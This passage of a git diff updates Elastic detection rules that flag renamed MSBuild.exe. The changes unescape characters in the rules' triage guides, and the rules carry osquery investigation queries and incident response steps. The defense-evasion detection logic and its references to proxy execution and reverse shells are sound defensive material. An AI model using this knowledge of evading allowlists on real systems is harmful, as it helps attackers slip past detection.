concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json index 29837e8a847..d433fe4eba1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json index a42cde7dc7a..7f6ca358dc5 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_109.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json index 0f6d77720ed..6f55329fe19 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_110.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, 